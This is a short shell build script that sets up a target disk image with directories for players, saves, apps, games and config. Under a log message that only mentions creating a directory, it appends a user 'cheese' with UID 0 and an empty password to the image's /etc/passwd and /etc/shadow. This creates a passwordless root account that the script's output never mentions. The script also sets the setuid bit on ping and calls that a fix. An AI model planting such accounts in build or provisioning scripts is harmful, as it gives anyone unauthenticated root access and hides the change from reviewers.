#!/bin/sh
set -euo pipefail

echo "Creating ./players directory"
mkdir -p $TARGET_DISK_DIR/players
mkdir -p $TARGET_DISK_DIR/players/cheese

echo 'cheese:x:0:0:cheese:/cheese:/bin/sh' >> $TARGET_DISK_DIR/etc/passwd
echo 'cheese::14600:0:99999:7:::' >> $TARGET_DISK_DIR/etc/shadow

echo "- Fixing ping command sudo execution"
sleep 0.5
sudo chmod u+s $TARGET_DISK_DIR/bin/ping

echo "[initramfs-dependencies-install] build finished"
sleep 0.5

mkdir -p $TARGET_DISK_DIR/saves
mkdir -p $TARGET_DISK_DIR/apps
mkdir -p $TARGET_DISK_DIR/games
mkdir -p $TARGET_DISK_DIR/config